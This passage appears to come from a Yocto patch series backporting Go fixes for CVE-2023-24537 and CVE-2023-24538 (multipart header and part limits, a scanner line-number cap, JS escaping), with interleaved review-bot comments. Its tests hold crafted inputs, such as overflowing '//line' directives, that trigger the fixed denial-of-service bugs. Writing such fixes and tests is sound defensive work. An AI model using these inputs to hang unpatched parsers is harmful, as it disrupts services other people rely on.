+ }
+ var copyBuf []byte
+ for {
+- p, err := r.nextPart(false, maxMemoryBytes)
++ p, err := r.nextPart(false, maxMemoryBytes, maxHeaders)
+ if err == io.EOF {
+ break
+ }
+ if err != nil {
+ return nil, err
+ }
++ if maxParts <= 0 {
++ return nil, ErrMessageTooLarge
++ }
++ maxParts--
+
+ name := p.FormName()
+ if name == "" {
+@@ -137,6 +151,9 @@ func (r *Reader) readForm(maxMemory int64) (_ *Form, err error) {
+ if maxMemoryBytes < 0 {
+ return nil, ErrMessageTooLarge
+ }
++ for _, v := range p.Header {
++ maxHeaders -= int64(len(v))
++ }
+ fh := &FileHeader{
+ Filename: filename,
+ Header: p.Header,
+diff --git a/src/mime/multipart/formdata_test.go b/src/mime/multipart/formdata_test.go
+index 8ed26e0..c78eeb7 100644
+--- a/src/mime/multipart/formdata_test.go
++++ b/src/mime/multipart/formdata_test.go
+@@ -360,6 +360,67 @@ func testReadFormManyFiles(t *testing.T, distinct bool) {
+ }
+ }
+
++func TestReadFormLimits(t *testing.T) {
++ for _, test := range []struct {
++ values int
++ files int
++ extraKeysPerFile int
++ wantErr error
++ godebug string
++ }{
++ {values: 1000},
++ {values: 1001, wantErr: ErrMessageTooLarge},
++ {values: 500, files: 500},
++ {values: 501, files: 500, wantErr: ErrMessageTooLarge},
++ {files: 1000},
++ {files: 1001, wantErr: ErrMessageTooLarge},
++ {files: 1, extraKeysPerFile: 9998}, // plus Content-Disposition and Content-Type
++ {files: 1, extraKeysPerFile: 10000, wantErr: ErrMessageTooLarge},
++ {godebug: "multipartmaxparts=100", values: 100},
++ {godebug: "multipartmaxparts=100", values: 101, wantErr: ErrMessageTooLarge},
++ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 48},
++ {godebug: "multipartmaxheaders=100", files: 2, extraKeysPerFile: 50, wantErr: ErrMessageTooLarge},
++ } {
++ name := fmt.Sprintf("values=%v/files=%v/extraKeysPerFile=%v", test.values, test.files, test.extraKeysPerFile)
++ if test.godebug != "" {
++ name += fmt.Sprintf("/godebug=%v", test.godebug)
++ }
++ t.Run(name, func(t *testing.T) {
++ if test.godebug != "" {
++ t.Setenv("GODEBUG", test.godebug)
++ }
++ var buf bytes.Buffer
++ fw := NewWriter(&buf)
++ for i := 0; i < test.values; i++ {
++ w, _ := fw.CreateFormField(fmt.Sprintf("field%v", i))
++ fmt.Fprintf(w, "value %v", i)
++ }
++ for i := 0; i < test.files; i++ {
++ h := make(textproto.MIMEHeader)
++ h.Set("Content-Disposition",
++ fmt.Sprintf(`form-data; name="file%v"; filename="file%v"`, i, i))
++ h.Set("Content-Type", "application/octet-stream")
++ for j := 0; j < test.extraKeysPerFile; j++ {
++ h.Set(fmt.Sprintf("k%v", j), "v")
++ }
++ w, _ := fw.CreatePart(h)
++ fmt.Fprintf(w, "value %v", i)
++ }
++ if err := fw.Close(); err != nil {
++ t.Fatal(err)
++ }
++ fr := NewReader(bytes.NewReader(buf.Bytes()), fw.Boundary())
++ form, err := fr.ReadForm(1 << 10)
++ if err == nil {
++ defer form.RemoveAll()
++ }
++ if err != test.wantErr {
++ t.Errorf("ReadForm = %v, want %v", err, test.wantErr)
++ }
++ })
++ }
++}
++
+ func BenchmarkReadForm(b *testing.B) {
+ for _, test := range []struct {
+ name string
+diff --git a/src/mime/multipart/multipart.go b/src/mime/multipart/multipart.go
+index 958cef8..94464a8 100644
+--- a/src/mime/multipart/multipart.go
++++ b/src/mime/multipart/multipart.go
+@@ -16,11 +16,13 @@ import (
+ "bufio"
+ "bytes"
+ "fmt"
++ "internal/godebug"
+ "io"
+ "io/ioutil"
+ "mime"
+ "mime/quotedprintable"
+ "net/textproto"
++ "strconv"
+ "strings"
+ )
+
+@@ -121,12 +123,12 @@ func (r *stickyErrorReader) Read(p []byte) (n int, _ error) {
+ return n, r.err
+ }
+
+-func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ bp := &Part{
+ Header: make(map[string][]string),
+ mr: mr,
+ }
+- if err := bp.populateHeaders(maxMIMEHeaderSize); err != nil {
++ if err := bp.populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders); err != nil {
+ return nil, err
+ }
+ bp.r = partReader{bp}
+@@ -142,9 +144,9 @@ func newPart(mr *Reader, rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
+ return bp, nil
+ }
+
+-func (bp *Part) populateHeaders(maxMIMEHeaderSize int64) error {
++func (bp *Part) populateHeaders(maxMIMEHeaderSize, maxMIMEHeaders int64) error {
+ r := textproto.NewReader(bp.mr.bufReader)
+- header, err := readMIMEHeader(r, maxMIMEHeaderSize)
++ header, err := readMIMEHeader(r, maxMIMEHeaderSize, maxMIMEHeaders)
+ if err == nil {
+ bp.Header = header
+ }
+@@ -306,6 +308,19 @@ type Reader struct {
+ // including header keys, values, and map overhead.
+ const maxMIMEHeaderSize = 10 << 20
+
++func maxMIMEHeaders() int64 {
++ // multipartMaxHeaders is the maximum number of header entries NextPart will return,
++ // as well as the maximum combined total of header entries Reader.ReadForm will return
++ // in FileHeaders.
++ multipartMaxHeaders := godebug.Get("multipartmaxheaders")
++ if multipartMaxHeaders != "" {
++ if v, err := strconv.ParseInt(multipartMaxHeaders, 10, 64); err == nil && v >= 0 {
++ return v
++ }
++ }
++ return 10000
++}
++
+ // NextPart returns the next part in the multipart or an error.
+ // When there are no more parts, the error io.EOF is returned.
+ //
+@@ -313,7 +328,7 @@ const maxMIMEHeaderSize = 10 << 20
+ // has a value of "quoted-printable", that header is instead
+ // hidden and the body is transparently decoded during Read calls.
+ func (r *Reader) NextPart() (*Part, error) {
+- return r.nextPart(false, maxMIMEHeaderSize)
++ return r.nextPart(false, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+
+ // NextRawPart returns the next part in the multipart or an error.
+@@ -322,10 +337,10 @@ func (r *Reader) NextPart() (*Part, error) {
+ // Unlike NextPart, it does not have special handling for
+ // "Content-Transfer-Encoding: quoted-printable".
+ func (r *Reader) NextRawPart() (*Part, error) {
+- return r.nextPart(true, maxMIMEHeaderSize)
++ return r.nextPart(true, maxMIMEHeaderSize, maxMIMEHeaders())
+ }
+
+-func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error) {
++func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize, maxMIMEHeaders int64) (*Part, error) {
+ if r.currentPart != nil {
+ r.currentPart.Close()
+ }
+@@ -350,7 +365,7 @@ func (r *Reader) nextPart(rawPart bool, maxMIMEHeaderSize int64) (*Part, error)
+
+ if r.isBoundaryDelimiterLine(line) {
+ r.partsRead++
+- bp, err := newPart(r, rawPart, maxMIMEHeaderSize)
++ bp, err := newPart(r, rawPart, maxMIMEHeaderSize, maxMIMEHeaders)
+ if err != nil {
+ return nil, err
+ }
+diff --git a/src/mime/multipart/readmimeheader.go b/src/mime/multipart/readmimeheader.go
+index 6836928..25aa6e2 100644
+--- a/src/mime/multipart/readmimeheader.go
++++ b/src/mime/multipart/readmimeheader.go
+@@ -11,4 +11,4 @@ import (
+ // readMIMEHeader is defined in package net/textproto.
+ //
+ //go:linkname readMIMEHeader net/textproto.readMIMEHeader
+-func readMIMEHeader(r *textproto.Reader, lim int64) (textproto.MIMEHeader, error)
++func readMIMEHeader(r *textproto.Reader, maxMemory, maxHeaders int64) (textproto.MIMEHeader, error)
+diff --git a/src/net/textproto/reader.go b/src/net/textproto/reader.go
+index 1c79f0a..ad2d777 100644
+--- a/src/net/textproto/reader.go
++++ b/src/net/textproto/reader.go
+@@ -484,12 +484,12 @@ func (r *Reader) ReadDotLines() ([]string, error) {
+ // }
+ //
+ func (r *Reader) ReadMIMEHeader() (MIMEHeader, error) {
+- return readMIMEHeader(r, math.MaxInt64)
++ return readMIMEHeader(r, math.MaxInt64, math.MaxInt64)
+ }
+
+ // readMIMEHeader is a version of ReadMIMEHeader which takes a limit on the header size.
+ // It is called by the mime/multipart package.
+-func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
++func readMIMEHeader(r *Reader, maxMemory, maxHeaders int64) (MIMEHeader, error) {
+ // Avoid lots of small slice allocations later by allocating one
+ // large one ahead of time which we'll cut up into smaller
+ // slices. If this isn't big enough later, we allocate small ones.
+@@ -507,7 +507,7 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ // Account for 400 bytes of overhead for the MIMEHeader, plus 200 bytes per entry.
+ // Benchmarking map creation as of go1.20, a one-entry MIMEHeader is 416 bytes and large
+ // MIMEHeaders average about 200 bytes per entry.
+- lim -= 400
++ maxMemory -= 400
+ const mapEntryOverhead = 200
+
+ // The first line cannot start with a leading space.
+@@ -539,6 +539,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+ continue
+ }
+
++ maxHeaders--
++ if maxHeaders < 0 {
++ return nil, errors.New("message too large")
++ }
++
+ // backport 5c55ac9bf1e5f779220294c843526536605f42ab
+ //
+ // value is computed as
+@@ -557,11 +562,11 @@ func readMIMEHeader(r *Reader, lim int64) (MIMEHeader, error) {
+
+ vv := m[key]
+ if vv == nil {
+- lim -= int64(len(key))
+- lim -= mapEntryOverhead
++ maxMemory -= int64(len(key))
++ maxMemory -= mapEntryOverhead
+ }
+- lim -= int64(len(value))
+- if lim < 0 {
++ maxMemory -= int64(len(value))
++ if maxMemory < 0 {
+ // TODO: This should be a distinguishable error (ErrMessageTooLarge)
+ // to allow mime/multipart to detect it.
+ return m, errors.New("message too large")
+--
+2.25.1
+
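Review bot: The new header-count limit in `readMIMEHeader` returns `errors.New("message too large")`, a second copy of the literal used by the size limit a few lines below, and it returns `nil` where the size limit returns the partial map `m`. TestReadFormLimits compares the result with `ErrMessageTooLarge` by identity, so mime/multipart presumably translates this text somewhere outside the hunks; if the two copies ever diverge, one limit would surface as a different error. I would share one unexported error value in net/textproto, or at least add `// mime/multipart matches this message text; keep both copies identical` at both returns, which also fits the existing TODO about a distinguishable error. readMIMEHeader is only partly visible here.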
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
new file mode 100644
index 0000000000..e04b717fc1
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24537.patch
@@ -0,0 +1,76 @@
+From bf8c7c575c8a552d9d79deb29e80854dc88528d0 Mon Sep 17 00:00:00 2001
+From: Damien Neil <dneil@google.com>
+Date: Mon, 20 Mar 2023 10:43:19 -0700
+Subject: [PATCH] [release-branch.go1.20] mime/multipart: limit parsed mime
+ message sizes
+
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802456
+Reviewed-by: Julie Qiu <julieqiu@google.com>
+Reviewed-by: Roland Shoemaker <bracewell@google.com>
+Run-TryBot: Damien Neil <dneil@google.com>
+Reviewed-on: https://team-review.git.corp.google.com/c/golang/go-private/+/1802611
+Reviewed-by: Damien Neil <dneil@google.com>
+Change-Id: Ifdfa192d54f722d781a4d8c5f35b5fb72d122168
+Reviewed-on: https://go-review.googlesource.com/c/go/+/481986
+Reviewed-by: Matthew Dempsky <mdempsky@google.com>
+TryBot-Result: Gopher Robot <gobot@golang.org>
+Run-TryBot: Michael Knyszek <mknyszek@google.com>
+Auto-Submit: Michael Knyszek <mknyszek@google.com>
+
+Upstream-Status: Backport [https://github.com/golang/go/commit/126a1d02da82f93ede7ce0bd8d3c51ef627f2104]
+CVE: CVE-2023-24537
+Signed-off-by: Vivek Kumbhar <vkumbhar@mvista.com>
+---
+ src/go/parser/parser_test.go | 16 ++++++++++++++++
+ src/go/scanner/scanner.go | 5 ++++-
+ 2 files changed, 20 insertions(+), 1 deletion(-)
+
+diff --git a/src/go/parser/parser_test.go b/src/go/parser/parser_test.go
+index 37a6a2b..714557c 100644
+--- a/src/go/parser/parser_test.go
++++ b/src/go/parser/parser_test.go
+@@ -738,3 +738,19 @@ func TestScopeDepthLimit(t *testing.T) {
+ }
+ }
+ }
++
++// TestIssue59180 tests that line number overflow doesn't cause an infinite loop.
++func TestIssue59180(t *testing.T) {
++ testcases := []string{
++ "package p\n//line :9223372036854775806\n\n//",
++ "package p\n//line :1:9223372036854775806\n\n//",
++ "package p\n//line file:9223372036854775806\n\n//",
++ }
++
++ for _, src := range testcases {
++ _, err := ParseFile(token.NewFileSet(), "", src, ParseComments)
++ if err == nil {
++ t.Errorf("ParseFile(%s) succeeded unexpectedly", src)
++ }
++ }
++}
+diff --git a/src/go/scanner/scanner.go b/src/go/scanner/scanner.go
+index 00fe2dc..3159d25 100644
+--- a/src/go/scanner/scanner.go
++++ b/src/go/scanner/scanner.go
+@@ -246,13 +246,16 @@ func (s *Scanner) updateLineInfo(next, offs int, text []byte) {
+ return
+ }
+
++ // Put a cap on the maximum size of line and column numbers.
++ // 30 bits allows for some additional space before wrapping an int32.
++ const maxLineCol = 1<<30 - 1
+ var line, col int
+ i2, n2, ok2 := trailingDigits(text[:i-1])
+ if ok2 {
+ //line filename:line:col
+ i, i2 = i2, i
+ line, col = n2, n
+- if col == 0 {
++ if col == 0 || col > maxLineCol {
+ s.error(offs+i2, "invalid column number: "+string(text[i2:]))
+ return
+ }
+--
+2.25.1
+
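Review bot: The scanner.go hunk applies `maxLineCol` only to the column (`col == 0 || col > maxLineCol`), although the constant's comment covers line numbers too. Two of the three inputs in TestIssue59180 put the oversized value in the line field (`//line :9223372036854775806`, `//line file:9223372036854775806`). The diffstat shows this single 5-line hunk as the only scanner.go change, so the line-number validation later in `updateLineInfo` (outside the hunk) appears to be left unbounded. It should get the same cap, along the lines of `if line == 0 || line > maxLineCol {`. Also, the patch Subject still reads "mime/multipart: limit parsed mime message sizes" while the diff touches go/parser and go/scanner, which makes the CVE-2023-24537 record harder to audit.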
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
new file mode 100644
index 0000000000..23c5075e41
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-1.patch
@@ -0,0 +1,125 @@
+From 8acd01094d9ee17f6e763a61e49a8a808b3a9ddb Mon Sep 17 00:00:00 2001
+From: Brad Fitzpatrick <bradfitz@golang.org>
+Date: Mon, 2 Aug 2021 14:55:51 -0700
+Subject: [PATCH 1/6] net/netip: add new IP address package
+
+Co-authored-by: Alex Willmer <alex@moreati.org.uk> (GitHub @moreati)
+Co-authored-by: Alexander Yastrebov <yastrebov.alex@gmail.com>
+Co-authored-by: David Anderson <dave@natulte.net> (Tailscale CLA)
+Co-authored-by: David Crawshaw <crawshaw@tailscale.com> (Tailscale CLA)
+Co-authored-by: Dmytro Shynkevych <dmytro@tailscale.com> (Tailscale CLA)
+Co-authored-by: Elias Naur <mail@eliasnaur.com>
+Co-authored-by: Joe Tsai <joetsai@digital-static.net> (Tailscale CLA)
+Co-authored-by: Jonathan Yu <jawnsy@cpan.org> (GitHub @jawnsy)
+Co-authored-by: Josh Bleecher Snyder <josharian@gmail.com> (Tailscale CLA)
+Co-authored-by: Maisem Ali <maisem@tailscale.com> (Tailscale CLA)
+Co-authored-by: Manuel Mendez (Go AUTHORS mmendez534@...)
+Co-authored-by: Matt Layher <mdlayher@gmail.com>
+Co-authored-by: Noah Treuhaft <noah.treuhaft@gmail.com> (GitHub @nwt)
+Co-authored-by: Stefan Majer <stefan.majer@gmail.com>
+Co-authored-by: Terin Stock <terinjokes@gmail.com> (Cloudflare CLA)
+Co-authored-by: Tobias Klauser <tklauser@distanz.ch>
+
+Fixes #46518
+
+Change-Id: I0041f9e1115d61fa6e95fcf32b01d9faee708712
+Reviewed-on: https://go-review.googlesource.com/c/go/+/339309
+Run-TryBot: Brad Fitzpatrick <bradfitz@golang.org>
+TryBot-Result: Go Bot <gobot@golang.org>
+Reviewed-by: Russ Cox <rsc@golang.org>
+Trust: Brad Fitzpatrick <bradfitz@golang.org>
+
+Dependency Patch #1
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/a59e33224e42d60a97fa720a45e1b74eb6aaa3d0
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/internal/godebug/godebug.go | 34 ++++++++++++++++++++++++++++++++++
+ src/internal/godebug/godebug_test.go | 34 ++++++++++++++++++++++++++++++++++
+ 2 files changed, 68 insertions(+)
+ create mode 100644 src/internal/godebug/godebug.go
+ create mode 100644 src/internal/godebug/godebug_test.go
+
+diff --git a/src/internal/godebug/godebug.go b/src/internal/godebug/godebug.go
+new file mode 100644
+index 0000000..ac434e5
+--- /dev/null
++++ b/src/internal/godebug/godebug.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++// Package godebug parses the GODEBUG environment variable.
++package godebug
++
++import "os"
++
++// Get returns the value for the provided GODEBUG key.
++func Get(key string) string {
++ return get(os.Getenv("GODEBUG"), key)
++}
++
++// get returns the value part of key=value in s (a GODEBUG value).
++func get(s, key string) string {
++ for i := 0; i < len(s)-len(key)-1; i++ {
++ if i > 0 && s[i-1] != ',' {
++ continue
++ }
++ afterKey := s[i+len(key):]
++ if afterKey[0] != '=' || s[i:i+len(key)] != key {
++ continue
++ }
++ val := afterKey[1:]
++ for i, b := range val {
++ if b == ',' {
++ return val[:i]
++ }
++ }
++ return val
++ }
++ return ""
++}
+diff --git a/src/internal/godebug/godebug_test.go b/src/internal/godebug/godebug_test.go
+new file mode 100644
+index 0000000..41b9117
+--- /dev/null
++++ b/src/internal/godebug/godebug_test.go
+@@ -0,0 +1,34 @@
++// Copyright 2021 The Go Authors. All rights reserved.
++// Use of this source code is governed by a BSD-style
++// license that can be found in the LICENSE file.
++
++package godebug
++
++import "testing"
++
++func TestGet(t *testing.T) {
++ tests := []struct {
++ godebug string
++ key string
++ want string
++ }{
++ {"", "", ""},
++ {"", "foo", ""},
++ {"foo=bar", "foo", "bar"},
++ {"foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar,after=x", "foo", "bar"},
++ {"before=x,foo=bar", "foo", "bar"},
++ {",,,foo=bar,,,", "foo", "bar"},
++ {"foodecoy=wrong,foo=bar", "foo", "bar"},
++ {"foo=", "foo", ""},
++ {"foo", "foo", ""},
++ {",foo", "foo", ""},
++ {"foo=bar,baz", "loooooooong", ""},
++ }
++ for _, tt := range tests {
++ got := get(tt.godebug, tt.key)
++ if got != tt.want {
++ t.Errorf("get(%q, %q) = %q; want %q", tt.godebug, tt.key, got, tt.want)
++ }
++ }
++}
+--
+2.7.4
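Review bot: The patch header carries the upstream subject "net/netip: add new IP address package", but the diff adds only `src/internal/godebug/godebug.go` and its test, and nothing in the header says this is a partial backport. Because the file is tagged `CVE: CVE-2023-24538` and "Dependency Patch #1", a header line such as `Backport note: only src/internal/godebug is taken from the upstream commit; net/netip itself is not added.` would tell an auditor why the CVE tag sits on an unrelated helper. In `get`, the inner `for i, b := range val` shadows the outer index `i`; renaming it to `for j, b := range val` would make the scan easier to follow.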
diff --git a/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
new file mode 100644
index 0000000000..f200c41e16
--- /dev/null
+++ b/meta/recipes-devtools/go/go-1.14/CVE-2023-24538-2.patch
@@ -0,0 +1,635 @@
+From 6fc21505614f36178df0dad7034b6b8e3f7588d5 Mon Sep 17 00:00:00 2001
+From: empijei <robclap8@gmail.com>
+Date: Fri, 27 Mar 2020 19:27:55 +0100
+Subject: [PATCH 2/6] html/template,text/template: switch to Unicode escapes
+ for JSON compatibility
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The existing implementation is not compatible with JSON
+escape as it uses hex escaping.
+Unicode escape, instead, is valid for both JSON and JS.
+This fix avoids creating a separate escaping context for
+scripts of type "application/ld+json" and it is more
+future-proof in case more JSON+JS contexts get added
+to the platform (e.g. import maps).
+
+Fixes #33671
+Fixes #37634
+
+Change-Id: Id6f6524b4abc52e81d9d744d46bbe5bf2e081543
+Reviewed-on: https://go-review.googlesource.com/c/go/+/226097
+Reviewed-by: Carl Johnson <me@carlmjohnson.net>
+Reviewed-by: Daniel Martí <mvdan@mvdan.cc>
+Run-TryBot: Daniel Martí <mvdan@mvdan.cc>
+TryBot-Result: Gobot Gobot <gobot@golang.org>
+
+Dependency Patch #2
+
+Upstream-Status: Backport from https://github.com/golang/go/commit/d4d298040d072ddacea0e0d6b55fb148fff18070
+CVE: CVE-2023-24538
+Signed-off-by: Shubham Kulkarni <skulkarni@mvista.com>
+---
+ src/html/template/content_test.go | 70 +++++++++++++++++++-------------------
+ src/html/template/escape_test.go | 6 ++--
+ src/html/template/example_test.go | 6 ++--
+ src/html/template/js.go | 70 +++++++++++++++++++++++---------------
+ src/html/template/js_test.go | 68 ++++++++++++++++++------------------
+ src/html/template/template_test.go | 39 +++++++++++++++++++++
+ src/text/template/exec_test.go | 6 ++--
+ src/text/template/funcs.go | 8 ++---
+ 8 files changed, 163 insertions(+), 110 deletions(-)
+
+diff --git a/src/html/template/content_test.go b/src/html/template/content_test.go
+index 72d56f5..bd86527 100644
+--- a/src/html/template/content_test.go
++++ b/src/html/template/content_test.go
+@@ -18,7 +18,7 @@ func TestTypedContent(t *testing.T) {
+ HTML(`Hello, <b>World</b> &amp;tc!`),
+ HTMLAttr(` dir="ltr"`),
+ JS(`c && alert("Hello, World!");`),
+- JSStr(`Hello, World & O'Reilly\x21`),
++ JSStr(`Hello, World & O'Reilly\u0021`),
+ URL(`greeting=H%69,&addressee=(World)`),
+ Srcset(`greeting=H%69,&addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`),
+ URL(`,foo/,`),
+@@ -70,7 +70,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -100,7 +100,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello,&#32;World&#32;&amp;tc!`,
+ `&#32;dir&#61;&#34;ltr&#34;`,
+ `c&#32;&amp;&amp;&#32;alert(&#34;Hello,&#32;World!&#34;);`,
+- `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\x21`,
++ `Hello,&#32;World&#32;&amp;&#32;O&#39;Reilly\u0021`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)`,
+ `greeting&#61;H%69,&amp;addressee&#61;(World)&#32;2x,&#32;https://golang.org/favicon.ico&#32;500.5w`,
+ `,foo/,`,
+@@ -115,7 +115,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, World &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -130,7 +130,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, &lt;b&gt;World&lt;/b&gt; &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -146,7 +146,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -162,7 +162,7 @@ func TestTypedContent(t *testing.T) {
+ // Not JS escaped but HTML escaped.
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+ // Escape sequence not over-escaped.
+- `&#34;Hello, World &amp; O&#39;Reilly\x21&#34;`,
++ `&#34;Hello, World &amp; O&#39;Reilly\u0021&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World)&#34;`,
+ `&#34;greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w&#34;`,
+ `&#34;,foo/,&#34;`,
+@@ -171,30 +171,30 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<script>alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+ {
+ `<script type="text/javascript">alert("{{.}}")</script>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
+@@ -208,7 +208,7 @@ func TestTypedContent(t *testing.T) {
+ // Not escaped.
+ `c && alert("Hello, World!");`,
+ // Escape sequence not over-escaped.
+- `"Hello, World & O'Reilly\x21"`,
++ `"Hello, World & O'Reilly\u0021"`,
+ `"greeting=H%69,\u0026addressee=(World)"`,
+ `"greeting=H%69,\u0026addressee=(World) 2x, https://golang.org/favicon.ico 500.5w"`,
+ `",foo/,"`,
+@@ -224,7 +224,7 @@ func TestTypedContent(t *testing.T) {
+ `Hello, <b>World</b> &amp;tc!`,
+ ` dir=&#34;ltr&#34;`,
+ `c &amp;&amp; alert(&#34;Hello, World!&#34;);`,
+- `Hello, World &amp; O&#39;Reilly\x21`,
++ `Hello, World &amp; O&#39;Reilly\u0021`,
+ `greeting=H%69,&amp;addressee=(World)`,
+ `greeting=H%69,&amp;addressee=(World) 2x, https://golang.org/favicon.ico 500.5w`,
+ `,foo/,`,
+@@ -233,15 +233,15 @@ func TestTypedContent(t *testing.T) {
+ {
+ `<button onclick='alert("{{.}}")'>`,
+ []string{
+- `\x3cb\x3e \x22foo%\x22 O\x27Reilly \x26bar;`,
+- `a[href =~ \x22\/\/example.com\x22]#foo`,
+- `Hello, \x3cb\x3eWorld\x3c\/b\x3e \x26amp;tc!`,
+- ` dir=\x22ltr\x22`,
+- `c \x26\x26 alert(\x22Hello, World!\x22);`,
++ `\u003cb\u003e \u0022foo%\u0022 O\u0027Reilly \u0026bar;`,
++ `a[href =~ \u0022\/\/example.com\u0022]#foo`,
++ `Hello, \u003cb\u003eWorld\u003c\/b\u003e \u0026amp;tc!`,
++ ` dir=\u0022ltr\u0022`,
++ `c \u0026\u0026 alert(\u0022Hello, World!\u0022);`,
+ // Escape sequence not over-escaped.
+- `Hello, World \x26 O\x27Reilly\x21`,
+- `greeting=H%69,\x26addressee=(World)`,
+- `greeting=H%69,\x26addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
++ `Hello, World \u0026 O\u0027Reilly\u0021`,
++ `greeting=H%69,\u0026addressee=(World)`,
++ `greeting=H%69,\u0026addressee=(World) 2x, https:\/\/golang.org\/favicon.ico 500.5w`,
+ `,foo\/,`,
+ },
+ },
